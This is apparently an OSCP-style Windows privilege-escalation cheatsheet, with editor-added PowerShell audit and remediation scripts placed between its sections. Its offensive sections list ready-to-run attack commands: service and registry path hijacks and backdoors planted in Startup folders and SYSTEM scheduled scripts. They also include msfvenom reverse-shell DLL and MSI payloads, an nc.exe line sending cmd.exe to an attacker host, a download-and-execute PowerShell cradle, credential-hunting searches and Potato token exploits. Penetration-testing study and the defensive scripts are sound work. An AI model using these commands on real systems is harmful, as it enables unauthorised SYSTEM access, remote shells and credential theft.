Windows Privilege Escalation

Enumeration

We need to enumerate basic information before attempting to escalate privileges.

#Get Windows version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
#Get patch information
wmic qfe get Caption, Description, HotFixID, InstalledOn

#Get current username
whoami

#Get groups and privilege information for the current user
whoami /all

#Get user list
net user

#Get information for a specific user
net user admin

#Get OS information like version, hotfixes etc.
systeminfo

#List all network connections and listening ports with the owning PID. Note the suspicious ones!
netstat -ano

#List firewall rules for all profiles!
netsh advfirewall firewall show rule name=all

#List all installed software.
wmic product get name

#List all installed software and versions.
wmic product get name, version

#Get scheduled task list
schtasks /query /fo LIST /v

#Running processes and the services they host
tasklist /SVC

#Installed drivers (look up the versions for known vulnerable drivers)
driverquery.exe /fo table

Kernel Exploits

Kernel exploits can crash the target, so a kernel exploit should only be run if there is no other way to escalate privileges.

Get the system information and transfer it to a remote Linux host. This is the command we need to run before searching for exploits on Google or Searchsploit:

systeminfo > systeminfo.txt

Use Windows Exploit Suggester to get exploit suggestions (update the database first, then compare it against the saved systeminfo output):

python windows-exploit-suggester.py -u
python windows-exploit-suggester.py -d <yyyy-mm-dd>-mssb.xls -i systeminfo.txt

We can use the information generated by Windows Exploit Suggester to find compiled exploits at the following link:

https://github.com/SecWiki/windows-kernel-exploits

Search Google and Searchsploit for exploits. Example:

  • Google> Windows Version Privilege Escalation Exploit
  • Searchsploit> $ searchsploit windows 10

Service Exploits

If a service is improperly configured, it may allow escalation to higher privileges. Five ways a service can be exploited:

  1. Insecure Service Permission
  2. Unquoted Service Path
  3. Insecure Registry Permission
  4. Insecure Service Executable
  5. DLL Hijacking

Service Enumeration

We should find all running services and their versions.

#cmd
tasklist /SVC

#powershell
Get-Service

#wmic
wmic service list brief

Listing All Running Services

sc queryex type= service
powershell.exe -c "Get-Service | Where-Object {$_.Status -eq 'Running'}"

Search for more info on a suspicious service with these cmd/PowerShell commands:

sc queryex type= service state= all | find /i "SERVICE_NAME: service_name"
#or
powershell.exe -c "Get-Service | Where-Object {$_.Name -like '*service_name*'}"

Find the status of the target service! We can check with these commands.

sc query service_name 
Get-Service service_name

Modifying a service binary path

sc config service_name binpath= "c:\windows\temp\shell.exe"

Start and Stop a Service

net start serv_name
net stop serv_name

Exploit Insecure Services Permission

We need to find a suspicious service name. If our user holds SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS on a service, we can exploit it by changing its binary path.

sc qc service_name
sc config service_name binpath= "c:\windows\temp\backdoor.exe"
net stop service_name
net start service_name
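A defender-side check for the same weakness, added here as an editor's example (it is not from the original cheatsheet or from any tool it mentions): it reads each service's security descriptor with sc.exe sdshow, parses the SDDL with .NET's RawSecurityDescriptor, and reports services where a low-privileged principal is allowed SERVICE_CHANGE_CONFIG or a right that implies it (WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_ALL). The list of "weak" principals is an assumption to adapt to your environment.

```powershell
# Editor-added audit example (not part of the original cheatsheet).
# Reports services whose DACL lets a low-privileged principal change the service
# configuration, which is exactly what the "sc config ... binpath=" hijack relies on.
# Access-mask bits are the documented service-object rights.
$SERVICE_CHANGE_CONFIG = 0x0002
$WRITE_DAC             = 0x00040000
$WRITE_OWNER           = 0x00080000
$GENERIC_ALL           = 0x10000000
$GENERIC_WRITE         = 0x40000000
$DangerousMask = $SERVICE_CHANGE_CONFIG -bor $WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_ALL -bor $GENERIC_WRITE

# Assumption: these principals are what "low-privileged" means on this host; adjust as needed.
$WeakPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

function Get-ServiceSddl {
    param([string]$Name)
    # sc.exe sdshow prints a blank line followed by the SDDL string
    $out = & sc.exe sdshow $Name 2>$null
    $line = $out | Where-Object { $_ -match '^\s*[DOGS]:' } | Select-Object -First 1
    if ($line) { return $line.Trim() }
    return $null
}

function Resolve-SidName {
    param([System.Security.Principal.SecurityIdentifier]$Sid)
    try { return $Sid.Translate([System.Security.Principal.NTAccount]).Value }
    catch { return $Sid.Value }   # unresolvable SID: report it raw
}

function Find-WeakServiceDacl {
    foreach ($svc in Get-Service) {
        $sddl = Get-ServiceSddl -Name $svc.Name
        if (-not $sddl) { continue }
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
        foreach ($ace in $sd.DiscretionaryAcl) {
            # Only access-allowed ACEs matter; skip deny entries and anything exotic
            if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
            if ($ace.AceQualifier -ne [System.Security.AccessControl.AceQualifier]::AccessAllowed) { continue }
            $who = Resolve-SidName -Sid $ace.SecurityIdentifier
            if ($WeakPrincipals -notcontains $who) { continue }
            if (($ace.AccessMask -band $DangerousMask) -eq 0) { continue }
            [pscustomobject]@{
                Service    = $svc.Name
                Principal  = $who
                AccessMask = ('0x{0:X8}' -f $ace.AccessMask)
                # Remediation: reset the DACL with "sc.exe sdset" or Set-Service -SecurityDescriptorSddl (PowerShell 7+)
                Finding    = 'Low-privileged principal can reconfigure this service'
            }
        }
    }
}

Find-WeakServiceDacl | Format-Table -AutoSize
```

Run it elevated so every service's descriptor can be read; a service that shows up here with a weak principal and a mask containing 0x0002 is one whose binary path that principal can rewrite.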

Exploiting Unquoted Service Path

If a service's binary path is not enclosed in quotes, it may help us escalate privileges. One of the folders in the service path needs to be writable. For example, I found C:\Program Files\Deploy Ready\Service Files\Deploy.exe. In the C:\Program Files\ directory, the “Deploy Ready” and “Service Files” subdirectories are writable. We can exploit this vulnerability to escalate privileges. How does it work?

  1. When the service starts, if it fails to execute Deploy.exe
  2. It will execute C:\Program Files\Deploy Ready\Service.exe
  3. If Service.exe is not found, C:\Program Files\Deploy.exe will be executed!

Find Vulnerability

# Manually
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

# With winpeas
.\winPEAS.exe quiet servicesinfo

Test if any directory is writable:

  1. Manually
echo "Test" > "C:\Path a\Path b\Path c\test.txt" #No "Access is denied"? We are fine then
icacls "C:\Path a\Path b\Path c\test.txt" #F=Full, W=Write
  2. With accesschk (more efficient)
.\accesschk.exe /accepteula -uwdq C:\
.\accesschk.exe /accepteula -uwdq "C:\Program Files\"
.\accesschk.exe /accepteula -uwdq "C:\Program Files\Service Path"
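The findstr one-liner and the accesschk calls above are two separate steps; the following script, added by the editor as an example (not from the cheatsheet, winPEAS or accesschk), joins them into one audit and generalises the example path: for every unquoted service path containing a space it computes all candidate binaries in the order Windows tries them (C:\Program.exe, then C:\Program Files\Deploy.exe, then C:\Program Files\Deploy Ready\Service.exe, and so on), checks whether the directory each candidate would be created in is writable by a low-privileged principal, and prints the sc config command that quotes the path. The weak-principal list is an assumption.

```powershell
# Editor-added audit example; not part of the original cheatsheet, winPEAS or accesschk.
# For every service whose path is unquoted and contains a space, list the candidate
# binaries Windows would try before the real one and report whether the directory
# each candidate lives in is writable by a low-privileged principal.
$WeakPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')  # assumption
$FsRights  = [System.Security.AccessControl.FileSystemRights]
$WriteMask = [int]($FsRights::CreateFiles -bor $FsRights::Write -bor $FsRights::Modify -bor $FsRights::FullControl)

function Test-WeakDirectoryWrite {
    param([string]$Directory)
    try { $acl = Get-Acl -LiteralPath $Directory -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]($ace.FileSystemRights) -band $WriteMask) -ne 0) { return $true }
    }
    return $false
}

function Find-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $full = $_.PathName
        # Skip quoted, empty and C:\Windows paths (the same filter the findstr one-liner applies)
        if (-not $full -or $full.StartsWith('"') -or $full -match '^[A-Za-z]:\\Windows\\') { return }
        # The executable is everything up to the first ".exe"; the rest are arguments
        if ($full -notmatch '^(?<exe>.+?\.exe)(?<rest>.*)$') { return }
        $exe = $Matches['exe']; $argStr = $Matches['rest']
        if ($exe -notmatch ' ') { return }   # no space in the executable path: not hijackable this way

        # Every prefix that ends just before a space is a candidate binary Windows tries first
        $candidates = for ($i = 0; $i -lt $exe.Length; $i++) {
            if ($exe.Substring($i, 1) -ne ' ') { continue }
            $prefix = $exe.Substring(0, $i)
            [pscustomobject]@{ Candidate = "$prefix.exe"; Directory = (Split-Path -Path $prefix -Parent) }
        }
        $writable = $candidates | Where-Object { $_.Directory -and (Test-WeakDirectoryWrite -Directory $_.Directory) }
        [pscustomobject]@{
            Service     = $_.Name
            StartMode   = $_.StartMode
            RunsAs      = $_.StartName
            PathName    = $full
            WritableDir = (@($writable | ForEach-Object { $_.Directory } | Select-Object -Unique) -join '; ')
            # Remediation: quote the executable and keep the original arguments
            FixCommand  = ('sc config "{0}" binPath= "\"{1}\"{2}"' -f $_.Name, $exe, $argStr)
        }
    }
}

Find-UnquotedServicePath | Format-Table -AutoSize
```

A row with a non-empty WritableDir and StartMode Auto running as LocalSystem is the configuration the exploit step below depends on; running the printed FixCommand (elevated) removes the ambiguity without touching the service binary.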

Exploit

If we don’t have permission to restart the service, we can try rebooting the machine. If the service is configured AUTO_START and runs as LocalSystem, we will get a SYSTEM shell.

sc qc "service_name"
copy \\smb_ip\Service.exe "C:\Program Files\Deploy Ready\Service.exe"
net start service_name
#If unable to start the service try rebooting
shutdown /r /t 0

Insecure Registry Permission

If we can’t write to the service's directory/folder, but can modify or write to its registry key, we can still escalate privileges.

Find Services

#Get all services info
.\winPEAS.exe quiet servicesinfo
reg query hklm\System\CurrentControlSet\Services /s /v imagepath

Confirm weak registry permissions

#Confirm weak permissions with a PowerShell command
Get-Acl HKLM:\System\CurrentControlSet\Services\SrvName | Format-List

#Confirm with accesschk
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\SrvName

Exploit

If we have confirmed that we can modify the registry:

#Add backdoor to the registry
reg add HKLM\SYSTEM\CurrentControlSet\Services\SrvName /v ImagePath /t REG_EXPAND_SZ /d C:\windows\temp\backdoor.exe /f
#Start the service
net start SrvName
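The Get-Acl and accesschk checks above look at one service key at a time. The following script, added by the editor as an example (not from the cheatsheet or winPEAS), walks every key under HKLM\SYSTEM\CurrentControlSet\Services and reports those where a low-privileged principal can set values or rewrite permissions, alongside the ImagePath and account the service runs as, plus a remediation function that strips an explicit offending ACE. The weak-principal list is an assumption.

```powershell
# Editor-added audit example (not part of the original cheatsheet).
# Finds service registry keys whose DACL lets a low-privileged principal change
# values (ImagePath in particular) or rewrite the key's permissions.
$WeakPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')  # assumption
$RegRights    = [System.Security.AccessControl.RegistryRights]
$RegWriteMask = [int]($RegRights::SetValue -bor $RegRights::CreateSubKey -bor $RegRights::WriteKey -bor
                      $RegRights::ChangePermissions -bor $RegRights::TakeOwnership -bor $RegRights::FullControl)

function Find-WeakServiceKey {
    param([string]$ServicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services')
    foreach ($key in Get-ChildItem -Path $ServicesKey -ErrorAction SilentlyContinue) {
        try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]($ace.RegistryRights) -band $RegWriteMask) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $key.PSChildName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
                ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
                RunsAs    = (Get-ItemProperty -Path $key.PSPath -Name ObjectName -ErrorAction SilentlyContinue).ObjectName
            }
        }
    }
}

# Remediation for a confirmed finding: drop the explicit (non-inherited) allow ACEs for that principal. Run elevated.
function Remove-WeakServiceKeyAce {
    param([string]$Service, [string]$Principal)
    $path = "HKLM:\SYSTEM\CurrentControlSet\Services\$Service"
    $acl = Get-Acl -Path $path
    $toRemove = $acl.Access | Where-Object {
        $_.IdentityReference.Value -eq $Principal -and $_.AccessControlType -eq 'Allow' -and -not $_.IsInherited
    }
    foreach ($ace in $toRemove) { [void]$acl.RemoveAccessRule($ace) }
    Set-Acl -Path $path -AclObject $acl
}

Find-WeakServiceKey | Format-Table -AutoSize
```

An inherited ACE means the weakness comes from a parent key and should be fixed there rather than on the individual service; the Inherited column makes that distinction visible before you call Remove-WeakServiceKeyAce.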

DLL Hijacking

If a program or service tries to load a DLL that is missing from the directory it searches, we can supply our own malicious DLL for escalation. The directory the DLL is loaded from needs to be writable!

Check Permission of the Program folder

icacls C:\program\

Create a malicious DLL file and move the payload to the directory the program loads from.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attack_IP LPORT=attacker_port -f dll -o existing.dll

Now try restarting the service or executing the vulnerable program.

Exploit Startup Program

We need to copy accesschk64.exe to the remote host to check permissions. If we have FILE_ALL_ACCESS on a program, we can exploit it for a system shell.

accesschk64.exe -wvu "C:\Program Files\Autorun Program"
copy \\smb_ip\backdoor.exe "C:\Program Files\Autorun Program\program.exe"

We can also get an admin session by exploiting startup applications. Check the permissions: if the folder is writable, we just need to copy our shell.exe to that folder and wait for an admin to log in.

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
copy \\smb_ip\bak.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\bak.exe"

Exploiting AlwaysInstallElevated

We need to check whether it is enabled. If the value is 0x1, we can exploit it!

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Generate a backdoor with Metasploit and transfer it to the victim machine

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tester_ip LPORT=tester_port -f msi -o smb-folder/shell.msi

Copy shell.msi to victim machine using SMB or other way and run:

msiexec /quiet /qn /i shell.msi

Exploiting Clear Text password

If we are lucky, we may find passwords in clear text.

Finding WiFi passwords

netsh wlan show profile
netsh wlan show profile <SSID> key=clear

Search for sensitive files that may contain credentials

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll"

Search for "Password"

#Search suspicious files by filename
dir /s /W *pass* == *cred* == *vnc* == *.config* | findstr /i /v "\\windows"

#Search suspicious files by content
findstr /D:C:\ /si password *.xml *.ini *.txt #A lot of output can be generated
findstr /D:C:\ /M /SI password *.xml *.ini *.txt 2>nul | findstr /V /I "\\AppData\\Local \\WinXsX ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.CloudExperienceHost" 2>nul

Search Password in Registry

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" #Autologin
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s #Check the values saved in each session, user/password could be there
reg query "HKCU\Software\OpenSSH\Agent\Key"

# Search for passwords inside all the registry
reg query HKLM /f password /t REG_SZ /s #Look for registries that contains "password"
reg query HKCU /f password /t REG_SZ /s #Look for registries that contains "password"
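Two of the registry conditions this page relies on, AlwaysInstallElevated (the "Exploiting AlwaysInstallElevated" section above) and a clear-text Winlogon autologon password (the first reg query in this section), are cheap to audit and fix from the administrator's side. The script below is an editor-added example, not from the cheatsheet: the Test-* functions report whether each condition is present and the Disable-*/Remove-* functions remediate it. Function names are the editor's; the remediation functions must run elevated.

```powershell
# Editor-added audit/remediation example (not part of the original cheatsheet).
# Checks two registry misconfigurations this page abuses and offers the matching fix.
function Test-AlwaysInstallElevated {
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer', 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = foreach ($k in $keys) {
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Key = $k; Value = $v }
    }
    # Windows Installer honours the policy only when both the machine and the user value are 1
    $exploitable = @($values | Where-Object { $_.Value -eq 1 }).Count -eq 2
    [pscustomobject]@{
        Setting     = 'AlwaysInstallElevated'
        Exploitable = $exploitable
        Detail      = (($values | ForEach-Object { "$($_.Key)=$($_.Value)" }) -join '; ')
    }
}

function Disable-AlwaysInstallElevated {
    foreach ($k in 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer', 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer') {
        if (Test-Path $k) { Set-ItemProperty -Path $k -Name AlwaysInstallElevated -Value 0 -Type DWord }
    }
}

function Test-AutoLogonPassword {
    $wl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue
    $hasPassword = -not [string]::IsNullOrEmpty($wl.DefaultPassword)
    [pscustomobject]@{
        Setting     = 'Winlogon DefaultPassword'
        Exploitable = $hasPassword
        Detail      = "AutoAdminLogon=$($wl.AutoAdminLogon); DefaultUserName=$($wl.DefaultUserName); clear-text password stored=$hasPassword"
    }
}

function Remove-AutoLogonPassword {
    # Clear the clear-text secret and turn automatic logon off
    $path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    Remove-ItemProperty -Path $path -Name DefaultPassword -ErrorAction SilentlyContinue
    Set-ItemProperty -Path $path -Name AutoAdminLogon -Value '0' -Type String
}

Test-AlwaysInstallElevated
Test-AutoLogonPassword
```

Where the Installer policy is delivered by Group Policy, set it to Disabled in the GPO rather than editing the local keys, or the next policy refresh will reintroduce it.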

Try with winPEAS:

.\winPEAS.exe quiet filesinfo userinfo

RunAS

Using cmdkey

cmdkey /list
runas /savecred /user:Administrator "c:\windows\temp\backdoor.exe"

By providing credentials

C:\Windows\System32\runas.exe /env /noprofile /user:<username> "c:\users\Public\nc.exe -nv <attacker-ip> 4444 -e cmd.exe"
#runas does not accept the password on the command line; it prompts for it

Exploiting Well known Software

Some software installed on the target machine may have a public exploit. We should search Google for an exploit matching the version of the installed software.

tasklist /v 
.\winpeas.exe quiet processinfo

Scheduled Tasks

#From CMD
schtasks /query /fo LIST /v
#In Powershell
PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

For example, the above command found that C:\Tools\Adm.Ps1 is running every 10 minutes as SYSTEM and we have rights to modify it:

accesschk.exe /accepteula -quvw user C:\Tools\Adm.Ps1

We can simply append our command so it executes as SYSTEM. Let’s append a command to run rev.exe (a reverse shell to port 443):

echo C:\windows\temp\rev.exe>> C:\Tools\Adm.Ps1

If everything goes well, we should have a SYSTEM shell within 10 minutes!
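Appending a line to a script that a SYSTEM task runs leaves no trace in the task itself, so the detection has to sit on the file. The following editor-added example (not from the cheatsheet) enumerates non-Microsoft scheduled tasks that run as SYSTEM, puts a success audit entry (SACL) for write/append on each task's executable and on any script named in its arguments, and then shows how to pull the resulting 4663 events with the account and process that wrote to the file. It assumes "Audit File System" success auditing is enabled in the local audit policy, runs elevated, and uses a 24-hour event window; function names are the editor's.

```powershell
# Editor-added detection example (not part of the original cheatsheet).
# Audit writes to the action files of non-Microsoft scheduled tasks that run as SYSTEM,
# then query the Security log for the 4663 events those writes generate.
$AuditRights = [System.Security.AccessControl.FileSystemRights]::WriteData -bor `
               [System.Security.AccessControl.FileSystemRights]::AppendData -bor `
               [System.Security.AccessControl.FileSystemRights]::WriteAttributes

function Get-SystemTaskActionFile {
    Get-ScheduledTask | Where-Object {
        $_.TaskPath -notlike '\Microsoft*' -and $_.Principal.UserId -match '^(SYSTEM|NT AUTHORITY\\SYSTEM|S-1-5-18)$'
    } | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
            # For a powershell.exe/cmd.exe action the real payload is the script named in its arguments
            $files = @($exe)
            if ($action.Arguments) {
                $files += [regex]::Matches($action.Arguments, '[A-Za-z]:\\[^"\s]+') | ForEach-Object { $_.Value }
            }
            foreach ($f in $files) {
                if (Test-Path -LiteralPath $f -PathType Leaf) {
                    [pscustomobject]@{ Task = $task.TaskName; File = $f }
                }
            }
        }
    }
}

function Add-WriteAuditRule {
    param([string]$File)
    $acl  = Get-Acl -LiteralPath $File -Audit
    $rule = New-Object System.Security.AccessControl.FileSystemAuditRule(
        'Everyone', $AuditRights, [System.Security.AccessControl.AuditFlags]::Success)
    $acl.AddAuditRule($rule)
    Set-Acl -LiteralPath $File -AclObject $acl
}

function Get-RecentWriteAudit {
    param([string[]]$Files, [int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4663; StartTime = (Get-Date).AddHours(-$Hours) } -ErrorAction SilentlyContinue |
        Where-Object { $m = $_.Message; @($Files | Where-Object { $m -like "*$_*" }).Count -gt 0 } |
        ForEach-Object {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Account = [regex]::Match($_.Message, 'Account Name:\s+([^\r\n]+)').Groups[1].Value.Trim()
                Process = [regex]::Match($_.Message, 'Process Name:\s+([^\r\n]+)').Groups[1].Value.Trim()
                Object  = [regex]::Match($_.Message, 'Object Name:\s+([^\r\n]+)').Groups[1].Value.Trim()
            }
        }
}

$targets = Get-SystemTaskActionFile
foreach ($t in $targets) { Add-WriteAuditRule -File $t.File }
Get-RecentWriteAudit -Files ($targets | ForEach-Object { $_.File }) | Format-Table -AutoSize
```

A 4663 whose Account is not an administrative or deployment identity, against a file that a SYSTEM task executes, is the write that the "echo ... >> Adm.Ps1" step above produces. The permanent fix is the ACL: a script run as SYSTEM should be writable only by administrators.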

Dangerous User Privileges

Some user privileges are dangerous: they can lead to higher privileges. I will list some of them:

SeImpersonatePrivilege

It allows acting as any other user, such as Administrator. The vulnerability could be exploited with JuicyPotato.

SeAssignPrimaryTokenPrivilege

Assign an access token to a new process. Can be exploited with JuicyPotato.

SeBackupPrivilege

If a user has this privilege, they are able to read files. That means the user can extract passwords/hashes from the registry, which could be used for a pass-the-hash attack.

SeRestorePrivilege

This privilege lets a user modify service binaries and DLLs, and also modify registry settings.

Other risky privileges

  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeDebugPrivilege
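Whoami /all shows these privileges for the current token only. To find which principals hold them across the whole machine, an administrator can export the local security policy. The script below is an editor-added example (not from the cheatsheet): it runs secedit /export, parses the [Privilege Rights] section, resolves SIDs to account names, and flags any holder of the privileges listed above that is not among the accounts expected to hold them on a default installation. The expected-holder list is an assumption; tune it to the host's role.

```powershell
# Editor-added audit example (not part of the original cheatsheet). Run elevated.
# Lists which principals hold the privileges named on this page and flags unexpected holders.
$DangerousPrivileges = @(
    'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeBackupPrivilege',
    'SeRestorePrivilege', 'SeCreateTokenPrivilege', 'SeLoadDriverPrivilege', 'SeDebugPrivilege'
)
# Assumption: holders that are normal on a default install; anything else deserves a look.
$ExpectedHolders = @('NT AUTHORITY\SYSTEM', 'NT AUTHORITY\LOCAL SERVICE', 'NT AUTHORITY\NETWORK SERVICE',
                     'NT AUTHORITY\SERVICE', 'BUILTIN\Administrators', 'BUILTIN\Backup Operators')

function ConvertTo-AccountName {
    param([string]$Token)
    # secedit writes SIDs as *S-1-5-..., and some built-in names as-is
    if ($Token.StartsWith('*')) {
        try {
            $sid = New-Object System.Security.Principal.SecurityIdentifier($Token.Substring(1))
            return $sid.Translate([System.Security.Principal.NTAccount]).Value
        } catch { return $Token.Substring(1) }   # unresolvable SID (e.g. deleted account): report raw
    }
    return $Token
}

function Get-PrivilegeHolders {
    $cfg = Join-Path $env:TEMP ('secpol-{0}.inf' -f [guid]::NewGuid())
    & secedit.exe /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    try {
        $inRights = $false
        foreach ($line in Get-Content -LiteralPath $cfg) {
            if ($line -match '^\[(.+)\]') { $inRights = ($Matches[1] -eq 'Privilege Rights'); continue }
            if (-not $inRights -or $line -notmatch '^(\w+)\s*=\s*(.*)$') { continue }
            $priv = $Matches[1]
            $holders = $Matches[2] -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ }
            if ($DangerousPrivileges -notcontains $priv) { continue }
            foreach ($h in $holders) {
                $name = ConvertTo-AccountName -Token $h
                [pscustomobject]@{
                    Privilege  = $priv
                    Holder     = $name
                    Unexpected = ($ExpectedHolders -notcontains $name)
                }
            }
        }
    } finally {
        Remove-Item -LiteralPath $cfg -ErrorAction SilentlyContinue
    }
}

Get-PrivilegeHolders | Sort-Object Unexpected -Descending | Format-Table -AutoSize
```

An application or service account that turns up as an unexpected holder of SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is exactly the starting position the Potato family of tools below needs; removing the right in the local security policy (or the GPO that grants it) closes that path.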

Hot Potato Exploit

A tutorial: https://pentestlab.blog/2017/04/13/hot-potato/

Windows 7

.\Potato.exe -ip <local ip> -cmd <command to run> -enable_defender true -enable_spoof true -disable_exhaust true

Windows 10

.\Potato.exe -ip <local ip> -cmd <cmd to run> -disable_exhaust true -disable_defender true

Juicy Potato

If SeImpersonate/SeAssignPrimaryToken is held, JuicyPotato can be used to escalate privileges.

Note: CLSID can be found in: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

JuicyPotato.exe -l 4444 -p C:\Windows\Temp\Rev.exe -t * -c {CLS_ID}

Rogue Potato

Just another Windows local privilege escalation from a service account to SYSTEM. The requirement is that the compromised account is a service account.

.\RoguePotato.exe -r 192.168.1.11 -l 9999 -e "C:\Windows\Temp\rev.exe"

Useful Commands

PowerUp

powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.21:8000/PowerUp.ps1'); Invoke-AllChecks"

Port Forwarding

chisel server -p 8000 --reverse
chisel.exe client 10.10.14.3:8000 R:1337:socks
#Add this line to /etc/proxychains4.conf, then run tools through the tunnel
socks5 127.0.0.1 1337
proxychains4 nmap 127.0.0.1 -p 8888

BloodHound

impacket-smbserver test $(pwd)

powershell -ep bypass -command "import-module \\10.10.14.7\test\SharpHound.ps1; invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice"

Reference: https://redtm.com/docs/privilege-escalation/2020-07-privilege-escalation/windows-privilege-escalation-cheatsheet-for-oscp/